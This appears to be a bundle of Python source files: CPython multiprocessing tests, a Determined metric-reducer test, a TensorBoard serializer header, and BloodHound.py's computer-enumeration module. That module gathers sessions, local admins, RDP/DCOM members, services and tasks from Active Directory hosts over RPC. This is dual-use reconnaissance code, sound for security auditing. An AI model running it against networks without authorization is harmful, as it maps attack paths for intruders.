p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
    # We recursively start processes.  Issue #17555 meant that the
    # after-fork registry would get duplicate entries for the same
    # lock.  The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
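# Minimal sketch (illustration only): the context API that TestStartMethod
# below checks.  get_context() returns an object exposing the same creation
# functions as the top-level module, but bound to a single start method.
def _example_start_method_context():
    import multiprocessing
    method = multiprocessing.get_all_start_methods()[0]   # e.g. 'fork' or 'spawn'
    ctx = multiprocessing.get_context(method)
    queue = ctx.Queue()
    queue.put('hello')
    return ctx.get_start_method(), queue.get()            # (method, 'hello')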
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, 'semaphore_tracker: %r: \[Errno' % name1)
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
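# --- Illustrative sketch (not part of the original test suite) -----------------------
# A minimal example of the pattern install_tests_in_module_dict() uses above: a base
# test class is combined with a mixin into a new concrete TestCase and registered under
# a readable name in the target module's globals. All names here are hypothetical.
def _make_concrete_case(base, mixin, newname, module_name, target_globals):
    # type(...) builds the class dynamically; this mirrors the
    # `class Temp(base, Mixin, unittest.TestCase)` construction in the loop above.
    cls = type(newname, (base, mixin, unittest.TestCase), {})
    cls.__module__ = module_name          # so unittest reports it under the importing module
    target_globs = target_globals
    target_globs[newname] = cls           # make it discoverable by the test loader
    return cls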
|
computers.py
|
####################
#
# Copyright (c) 2018 Fox-IT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
####################
from __future__ import unicode_literals
import queue
import threading
import logging
import traceback
from impacket.dcerpc.v5.rpcrt import DCERPCException
from bloodhound.enumeration.outputworker import OutputWorker
from bloodhound.enumeration.memberships import MembershipEnumerator
from bloodhound.ad.computer import ADComputer
from bloodhound.ad.utils import ADUtils
from future.utils import itervalues, iteritems, native_str
class ComputerEnumerator(MembershipEnumerator):
"""
Class to enumerate computers in the domain.
Contains the threading logic and workers which will call the collection
methods from the bloodhound.ad module.
This class extends the MembershipEnumerator class just to inherit the
membership lookup functions which are also needed for computers.
"""
def __init__(self, addomain, collect, do_gc_lookup=True):
"""
Computer enumeration. Enumerates all computers in the given domain.
Every domain enumerated will get its own instance of this class.
"""
self.addomain = addomain
# Blacklist and whitelist are only used for debugging purposes
self.blacklist = []
self.whitelist = []
self.do_gc_lookup = do_gc_lookup
# Store collection methods specified
self.collect = collect
def enumerate_computers(self, computers, num_workers=10):
"""
Enumerates the computers in the domain. This is threaded; you can specify the number of workers.
Threads are spawned to resolve computers and enumerate the information.
"""
q = queue.Queue()
result_q = queue.Queue()
results_worker = threading.Thread(target=OutputWorker.write_worker, args=(result_q, 'computers.json', 'sessions.json'))
results_worker.daemon = True
results_worker.start()
logging.info('Starting computer enumeration with %d workers', num_workers)
if len(computers) / num_workers > 500:
logging.info('The workload seems to be rather large. Consider increasing the number of workers.')
for _ in range(0, num_workers):
t = threading.Thread(target=self.work, args=(q,result_q))
t.daemon = True
t.start()
for _, computer in iteritems(computers):
if not 'attributes' in computer:
continue
if 'dNSHostName' not in computer['attributes']:
continue
hostname = computer['attributes']['dNSHostName']
if not hostname:
continue
samname = computer['attributes']['sAMAccountName']
# For debugging purposes only
if hostname in self.blacklist:
logging.info('Skipping computer: %s (blacklisted)', hostname)
continue
if len(self.whitelist) > 0 and hostname not in self.whitelist:
logging.info('Skipping computer: %s (not whitelisted)', hostname)
continue
q.put((hostname, samname, computer))
q.join()
result_q.put(None)
result_q.join()
def process_computer(self, hostname, samname, objectsid, entry, results_q):
"""
Processes a single computer, pushes the results of the computer to the given queue.
"""
logging.debug('Querying computer: %s', hostname)
c = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, objectsid=objectsid)
c.primarygroup = self.get_primary_membership(entry)
if c.try_connect() == True:
try:
if 'session' in self.collect:
sessions = c.rpc_get_sessions()
else:
sessions = []
if 'localadmin' in self.collect:
unresolved = c.rpc_get_group_members(544, c.admins)
c.rpc_resolve_sids(unresolved, c.admins)
if 'rdp' in self.collect:
unresolved = c.rpc_get_group_members(555, c.rdp)
c.rpc_resolve_sids(unresolved, c.rdp)
if 'dcom' in self.collect:
unresolved = c.rpc_get_group_members(562, c.dcom)
c.rpc_resolve_sids(unresolved, c.dcom)
if 'loggedon' in self.collect:
loggedon = c.rpc_get_loggedon()
else:
loggedon = []
if 'experimental' in self.collect:
services = c.rpc_get_services()
tasks = c.rpc_get_schtasks()
else:
services = []
tasks = []
c.rpc_close()
# c.rpc_get_domain_trusts()
results_q.put(('computer', c.get_bloodhound_data(entry, self.collect)))
if sessions is None:
sessions = []
# Process found sessions
for ses in sessions:
# For every session, resolve the SAM name in the GC if needed
domain = self.addomain.domain
if self.addomain.num_domains > 1 and self.do_gc_lookup:
try:
users = self.addomain.samcache.get(samname)
except KeyError:
# Look up the SAM name in the GC
users = self.addomain.objectresolver.gc_sam_lookup(ses['user'])
if users is None:
# Unknown user
continue
self.addomain.samcache.put(samname, users)
else:
users = [((u'%s@%s' % (ses['user'], domain)).upper(), 2)]
# Resolve the IP to obtain the host the session is from
try:
target = self.addomain.dnscache.get(ses['source'])
except KeyError:
target = ADUtils.ip2host(ses['source'], self.addomain.dnsresolver, self.addomain.dns_tcp)
# Even if the result is the IP (aka could not resolve PTR) we still cache
# it since this result is unlikely to change during this run
self.addomain.dnscache.put_single(ses['source'], target)
if ':' in target:
# IPv6 address, not very useful
continue
if '.' not in target:
logging.debug('Resolved target does not look like an IP or domain. Assuming hostname: %s', target)
target = '%s.%s' % (target, domain)
# Put the result on the results queue.
for user in users:
results_q.put(('session', {'UserName': user[0].upper(),
'ComputerName': target.upper(),
'Weight': user[1]}))
if loggedon is None:
loggedon = []
# Put the logged on users on the queue too
for user in loggedon:
results_q.put(('session', {'UserName': ('%s@%s' % user).upper(),
'ComputerName': hostname.upper(),
'Weight': 1}))
# Process Tasks
for taskuser in tasks:
try:
user = self.addomain.sidcache.get(taskuser)
except KeyError:
# Resolve SID in GC
userentry = self.addomain.objectresolver.resolve_sid(taskuser)
# Resolve it to an entry and store in the cache
user = ADUtils.resolve_ad_entry(userentry)
self.addomain.sidcache.put(taskuser, user)
logging.debug('Resolved TASK SID to username: %s', user['principal'])
# Use sessions for now
results_q.put(('session', {'UserName': user['principal'].upper(),
'ComputerName': hostname.upper(),
'Weight': 2}))
# Process Services
for serviceuser in services:
# Todo: use own cache
try:
user = self.addomain.sidcache.get(serviceuser)
except KeyError:
# Resolve UPN in GC
userentry = self.addomain.objectresolver.resolve_upn(serviceuser)
# Resolve it to an entry and store in the cache
user = ADUtils.resolve_ad_entry(userentry)
self.addomain.sidcache.put(serviceuser, user)
logging.debug('Resolved Service UPN to username: %s', user['principal'])
# Use sessions for now
results_q.put(('session', {'UserName': user['principal'].upper(),
'ComputerName': hostname.upper(),
'Weight': 2}))
except DCERPCException:
logging.warning('Querying computer failed: %s' % hostname)
except Exception as e:
logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e))
logging.info(traceback.format_exc())
else:
# Write the info we have to the file regardless
try:
results_q.put(('computer', c.get_bloodhound_data(entry, self.collect)))
except Exception as e:
logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e))
logging.info(traceback.format_exc())
def work(self, q, results_q):
"""
Work function, will obtain work from the given queue and will push results on the results_q.
"""
logging.debug('Start working')
while True:
hostname, samname, entry = q.get()
objectsid = entry['attributes']['objectSid']
logging.info('Querying computer: %s', hostname)
self.process_computer(hostname, samname, objectsid, entry, results_q)
q.task_done()
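# --- Illustrative sketch (not part of BloodHound) -------------------------------------
# A minimal, generic example of the producer/consumer pattern that enumerate_computers()
# and work() implement above: worker threads pull items from a task queue, push results
# onto a results queue, and q.join() blocks until every item has been task_done()'d.
# The doubling "work" below is a placeholder for the real per-computer enumeration.
def _queue_worker_demo(items, num_workers=4):
    task_q = queue.Queue()
    result_q = queue.Queue()

    def worker():
        while True:
            item = task_q.get()
            result_q.put(item * 2)       # stand-in for process_computer()
            task_q.task_done()

    for _ in range(num_workers):
        t = threading.Thread(target=worker)
        t.daemon = True                  # daemon threads die with the main thread
        t.start()
    for item in items:
        task_q.put(item)
    task_q.join()                        # wait until all queued work is processed
    return sorted(result_q.get() for _ in items)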
|
test_reducer.py
|
import itertools
import logging
import threading
import traceback
from collections import namedtuple
from typing import Any, Callable, List
import numpy as np
import pytest
from determined import _core
from determined.pytorch import Reducer, _PyTorchReducerContext, _reduce_metrics
logger = logging.getLogger(__name__)
def test_reducer() -> None:
metrics = np.array([0.25, 0.5, 0.75, 1, 25.5, 1.9])
assert np.around(_reduce_metrics(Reducer.AVG, metrics), decimals=2) == 4.98
assert _reduce_metrics(Reducer.SUM, metrics) == 29.9
assert _reduce_metrics(Reducer.MIN, metrics) == 0.25
assert _reduce_metrics(Reducer.MAX, metrics) == 25.5
batches_per_process = [1, 2, 5, 4, 5, 6]
assert np.around(_reduce_metrics(Reducer.AVG, metrics, batches_per_process), decimals=2) == 6.43
DummyDistributedReducerContext = namedtuple(
"DummyDistributedReducerContext", "distributed_context reducer_context wrapped_reducer"
)
def dummy_reducer(values: List) -> Any:
logger.debug(f"reducing {values}")
flat = [v for sublist in values for v in sublist]
return {"values": flat, "sum": sum(flat)}
@pytest.mark.parametrize("cross_size", [1, 3])
@pytest.mark.parametrize("local_size", [1, 3])
def test_custom_reducer_slot_order(cross_size: int, local_size: int) -> None:
size = cross_size * local_size
dataset_size = 47
def do_parallel(fn: Callable) -> List:
"""
Run the same function on one-thread-per-rank, assert there were no exceptions, and return
the results from each rank.
"""
results = [None] * size # type: List
errors = [None] * size # type: List
threads = []
for cross_rank, local_rank in itertools.product(range(cross_size), range(local_size)):
rank = cross_rank * local_size + local_rank
def _fn(rank: int, cross_rank: int, local_rank: int) -> None:
try:
results[rank] = fn(rank, cross_rank, local_rank)
except Exception:
errors[rank] = traceback.format_exc()
raise
threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank)))
# encourage allgather to occur in not-the-correct order to test the reordering
for thread in reversed(threads):
thread.start()
for thread in threads:
thread.join()
assert errors == [None] * size, "not all threads exited without error"
return results
def make_reducer_context(
rank: int, cross_rank: int, local_rank: int
) -> DummyDistributedReducerContext:
distributed_context = _core.DistributedContext(
rank=cross_rank * local_size + local_rank,
size=cross_size * local_size,
local_rank=local_rank,
local_size=local_size,
cross_rank=cross_rank,
cross_size=cross_size,
chief_ip="localhost",
force_tcp=False,
)
reducer_context = _PyTorchReducerContext(distributed_context._zmq_allgather)
# reducer_context.wrap_reducer(lambda x: x, "dummy")
wrapped_reducer = reducer_context.wrap_reducer(dummy_reducer)
return DummyDistributedReducerContext(distributed_context, reducer_context, wrapped_reducer)
trials = do_parallel(make_reducer_context)
def get_batch_list(
rank: int, batch_size: int, num_workers: int, seq: List[int]
) -> List[List[int]]:
total_batches = (len(seq) + (batch_size - 1)) // batch_size
my_batch_indices = [i for i in range(total_batches) if i % num_workers == rank]
all_batches = [
seq[batch_size * k : min(batch_size * k + batch_size, len(seq))]
for k in range(total_batches)
]
return [b for i, b in enumerate(all_batches) if i in my_batch_indices]
observations = list(range(dataset_size))
for rank, trial in enumerate(trials):
for batch in get_batch_list(rank, 2, len(trials), observations):
trial.wrapped_reducer.update(batch)
results = do_parallel(lambda rank, _, __: trials[rank].reducer_context.reduce_metrics(False))
logger.debug(results)
# Close all distributed contexts
for trial in trials:
trial.distributed_context.close()
for i, result in enumerate(results):
assert result["sum"] == dataset_size * (dataset_size - 1) // 2
assert all(
i == v for i, v in enumerate(result["values"])
), f"result[{i}]={result} is not in original order"
|
serialize_tensorboard.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Consume and serialize all of the data from a running TensorBoard instance.
This program connects to a live TensorBoard backend at the given port, and saves
all of the data to local disk as JSON in a predictable format.
This makes it easy to mock out the TensorBoard backend so that the frontend
may be tested in isolation.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import json
import os
import os.path
import shutil
import StringIO
import threading
import urllib
import six
from six.moves import http_client
import tensorflow as tf
from tensorflow.python.summary import event_multiplexer
from tensorflow.tensorboard.backend import server
tf.flags.DEFINE_string('logdir', None, """the logdir to pass to the TensorBoard
backend; data will be read from this logdir for serialization.""")
tf.flags.DEFINE_string('target', None, """The directory where serialized data
will be written""")
tf.flags.DEFINE_boolean('overwrite', False, """Whether to remove and overwrite
TARGET if it already exists.""")
tf.flags.DEFINE_boolean(
'purge_orphaned_data', True, 'Whether to purge data that '
'may have been orphaned due to TensorBoard restarts. '
'Disabling purge_orphaned_data can be used to debug data '
'disappearance.')
FLAGS = tf.flags.FLAGS
